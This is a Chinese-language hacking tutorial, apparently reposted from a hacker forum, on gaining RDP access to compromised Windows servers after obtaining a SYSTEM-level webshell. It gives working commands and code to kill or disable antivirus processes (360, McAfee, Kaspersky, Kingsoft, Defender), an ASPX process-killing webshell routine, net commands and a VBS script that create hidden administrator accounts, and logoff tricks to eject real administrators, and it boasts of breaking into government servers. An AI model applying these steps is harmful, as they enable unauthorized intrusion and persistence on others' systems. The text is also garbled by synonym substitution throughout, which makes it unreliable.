|
|
|
联系客服020-83701501

[集合]解决system权限3389无法添加的用户情况

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
[集合]方案system权限33八9无奈减少的用户状况

Webshell有了SYSTEM权限,却无奈胜利减少administrators用户,因此招致无奈胜利连接33八9。总结原由有下列几点:
I.杀软篇
1,360杀毒软件
2,麦咖啡杀毒软件
3,卡巴斯基杀毒软件
4,其自尽毒软件或防护软件
II.策略篇
1,33八9端口改观
2,莫名其妙无奈减少账户
3,规划员限制篇
4,系统已达最大连接数处置惩罚

&#八212;&#八212;&#八212;&#八212;&#八212;&#八212;&#八212;&#八211;I. 杀软篇&#八212;&#八212;&#八212;&#八212;&#八212;&#八212;&#八212;&#八212;&#八212;&#八211;
1,360杀毒软件
常常会在国内的1些做事器上碰到360杀毒和防护软件,若是独霸站点shell截止减少administrators账户时,360会阻止并提示规划员,招致减少靡烂。
那么如何攻破360的限制?360不克不及完满的支持Server系统,也就是说,其实很简单。
阻止Webshell减少账户的主若是360主动避免,而完结了主动避免,360杀毒基础就是安插。
那天手痒去baidu搜了下blackbap.org这个关头字,居然呈现在360论坛上,原本是Silic垦荒的php大马被某个做事器规划员检举到360论坛下来了。
大体就是这个网管把站点shell传下来,说360查不出来,盼望更新病毒库如此,了局360工程师看了之后说更新360就能够杀到了,了局网管说更新了 照旧杀不到。今后工程师说装什么什么的,网管说装了,照旧杀不到,今后工程师就缩头乌龟了。可见360在server下面很渣滓,用小明的话说就是,请把 拿着打口水仗的钱多花在研发产品上吧。
好了,扯淡到此为止,攻破办法也该千呼万唤始出来了。
先实行tasklist看1下过程列表,今后

Default
taskkill /im 过程名.exe /f

把主动避免完结
360干系过程下列:
360tray.exe,360rp.exe,Zhudongfangyu.exe,360rps.exe,这几个灭了,基础上360的劝止就废弃了,该加账户加账户,该pr就pr了。
Windows下Apache+PHP的非凡性,招致许多php站的站点shell有SYSTEM的权限,以是完结360简直易如反掌啊。
即使不是SYSTEM,也有法子的,比如ASPX,asp.net有个操纵过程的服从。看代码(直接从站点shell下面拔下来的):

Default
123456七八9101112131415161七1八1920     protected void kp_Click(object sender, EventArgs e)    {    Process[] kp = Process.GetProcesses ();    foreach ( Process kp1 in kp )    if (kp1.ProcessName == ListBox1.SelectedValue.ToString())    {    try    {    kp1.Kill();    Response.Write("<script>alert('Killed');location.href='?'</" + "script>");    ListBox1.Items.Clear();     }    catch (Exception x)    {    Response.Write(x.Message.ToString());    Response.End();    }    }    }

asp.net的这1个kill()函数即使是IIS+ASPX的users用户组依然也许弥留杀死360。
有些SYSYTEM权限却干不掉360,比如360tray.exe,360safe.exe,也许先query user看看规划员外形,因为很大若是规划员登岸之后运行了图形界面没封锁,系统不实行taskkill
以是logoff把规划员踢了,今后360有的过程就自己灭了,这种状况多呈现在200八的server系统上

2,麦咖啡杀毒软件
从前就谈过了关于如何绕过麦咖啡杀毒软件取得33八9登岸权限的文章。

文章在这里:http://www.91ri.org/5八6七.html

那么残缺1下进程就是,启用Guest账户,修改Guest用户的明码,减少Guest为administrators用户组。
经过进程测试,麦咖啡的防护过程惟恐是攻破的,因此cmd敕令下列:

Default
123     net user guest /active:yes          //将guest用户启用    net user guest silic!&11133        //修改guest明码    net localgroup administrators guest /add    //减少guest到规划员用户组中

这三条敕令第2条大约第三条无意偶尔候大要不会体现敕令实行胜利,然则理论上只若是SYSTEM权限,就理应也许实行胜利的,有无回显并不严重。

3,卡巴斯基
卡巴斯基的防护也是让人头疼的。关于攻破卡巴斯基的办法,有许多。
调处系统光阴,让卡巴的key收效,这就不说了。还有mkdir确立以不法字符“.”命名的文件夹,将pr等提权步骤传出来。
SYSTEM攻破卡巴的避免直接减少用户,惟恐不太简单,不过也许尝试,用taskkill完结过程的语句后背 & net user add敕令,同时实行完结过程和减少账户。
此办法还没有实践,然则现实上是也许的,因为卡巴不像麦咖啡,它也许直接被完结,然则立刻就会重启过程。

4,金山防护软件
起首说KSafeSvc.exe, 那时不知道是什么玩意, 从文件花色测理应是个金山的货色。
这个过程即使是taskkill也是搞不定的&#八230;只有有它,net user /add的时刻,就算net.exe更名了,它也会弹出是否阻止的窗口(大若是它弹的,就算不是它弹的,也要干掉他才能减少)
然则有个敕令叫ntsd,也许终结掉大部分过程,比如winlogon.exe svchost.exe这些..
今后就ntsd -c q -p PID完结了KSafeSvc.exe
今后说1下:金山毒霸+金山卫士+瑞星防火墙的组合
这个组合看似很牛逼,其实很傻逼。昔日就碰到个system的php,下面就是金山毒霸+金山卫士+瑞星防火墙的组合
也许将下列代码保管到c:\windows\temp\a.vbs

Default
123456七八9     set wsnetwork=CreateObject("WSCRIPT.NETWORK")    os="WinNT://"&wsnetwork.ComputerName    Set ob=GetObject(os)    Set oe=GetObject(os&"/Administrators,group")    Set od=ob.Create("user","silic")    od.SetPassword "silic"    od.SetInfo    Set of=GetObject(os&"/silic",user)    oe.add os&"/silic"

今后用下列敕令实行,就能够取得账户为silic明码为silic的规划员账户了:

Default
    cscript c:\windows\temp\a.vbs

5,禁用做事法

Default
    sc config 做事名 start= disabled

无意偶尔候mysql大约mssql等等提权的时刻,会产生杀软无奈完结,招致提权靡烂的状况。
咱们给杀软做事设置为禁用,重启做事器,杀毒防护做事就不克不及运行。就无阻疏浚了,比如:

Default
    sc config MsMpSvc start= disabled

5,其他防护软件
见过许多非主流的防护软件,什么护卫盾啊,Safe3防旋转啊,还有种种相似步骤,具体名字我忘了。
这些软件的攻破办法和主流防护软件攻破办法大体雷同,完结过程,大约不独霸减少账户,直接启用现有的Guest来攻破监控,不赘述了
此外赔偿1种办法,就是将防护软件的做事从主动启动改为不启动,今后重启做事器。这种办法对绝大部分做事器无效。

&#八212;&#八212;&#八212;&#八212;&#八212;&#八212;&#八212;&#八212;&#八212;&#八212;&#八211;II,策略篇&#八212;&#八212;&#八212;&#八212;&#八212;&#八212;&#八212;&#八212;&#八212;&#八211;
1,33八9端口改观
截止33八9减少账户前起首要知道33八9终于封锁没有。
今朝只碰到过33八9端口改观的例子,没见过不封锁33八9的例子。那为何有的外网33八9连不上呢?
原由很简单,33八9端口改观了呗。找出来的办法再简单不过了netstat -an查抄部分封锁的端口。
1个1个可疑的端笔试未免过低劣了。netstat -ano查抄端口和独霸端口的过程pid,今后Tasklist看1下有哪个svchost.exe过程的pid独霸了端口
留意,是svchost.exe当中的某个。

2,莫名微妙无奈减少账户
什么是莫名微妙?有些主机,Webshell是System权限,tasklist也看不上任何防护的过程,规划员也没在线,提权步骤也减少不了,怎么搞?
有因必有果,这样的状况减少不了,大都是系统有组策略限制,集体限制的是明码最吵嘴度。而这个组策略又大都是麦咖啡等防护软件设置上的。大约拖沓索性就是装机的系统各人就GHO上了这个设置。
攻破办法不必说了,把明码位数设置长1点就ok,原本明码是123456,现在改为1234abcd!@#$就过了
若是照旧减少不上,也许尝试用vbs脚本来减少。

3,规划员限制
有些BT规划员很可爱,直接把c:\windows\system32的net.exe给删了大约换了,因此你直接net的时刻会提示回绝会面大约不是系统敕令等等相似提示如此。
规划员看似很牛B,其实很傻逼,系统的net.exe没了,你自己传1个自己的net.exe就攻破了。
诚然,也有64位系统和你的步骤不兼容的状况产生,他是64你就传64位的,很好搞。

4,达到最大连接限制
无意偶尔候减少了账户,然则连接提示最大连接数限制。规划员不在线,却占着线不让你下来,等规划员自己上线了,再把你删了。这种规划员够缺德的
关于这种上不去的,起首query user查抄在线的账户,今后看他的登岸ID,1般是0,最高不超越八,超越八说明做事器良久没重启了(这个没准的)
今后logoff ID,就把对应ID的规划员踢掉了。今后就能够登录了。
诚然你在logoff的时刻不要把自己logoff了,也不最好不要白日踢人。规划员在线被人踢掉的话,你懂的。— —!
2011年和越南黑阔搞攻防切磋的时刻,咱们站点的人就在人越南的gov做事器上乱搞,今后。。。咱站点的黑阔挂菊花谈天室,规划员就删啊删的,咱站点的 黑阔就logoff了规划员的账户,今后禁用和administrator。。。那时规划员就眼瞅着自己在菊花谈天室谈天,今后跑了半个小时去机房把网线 拔了。。。logoff敕令真的很恶毒,很是是对1些做事器不在当地的站点来说。。。

赔偿
有些SYSYTEM权限却干不掉360,比如360tray.exe,360safe.exe,也许先query user看看规划员外形
很大若是规划员登岸之后运行了图形界面没封锁,系统不实行taskkill
以是logoff把规划员踢了,今后360有的过程就自己灭了
多呈现在200八的server系统上

link:http://bbs.blackbap.org/thread-2331-1-1.html

91ri.org:我就不点评这篇文章了,1看就知道挺不错的,虽然老了点,但值得珍藏,转载畴昔与自己分享。

本文由网络平安攻防研究室(www.91ri.org)音讯平安小组收集整理,转载请阐明缘故。

数安新闻+更多

证书相关+更多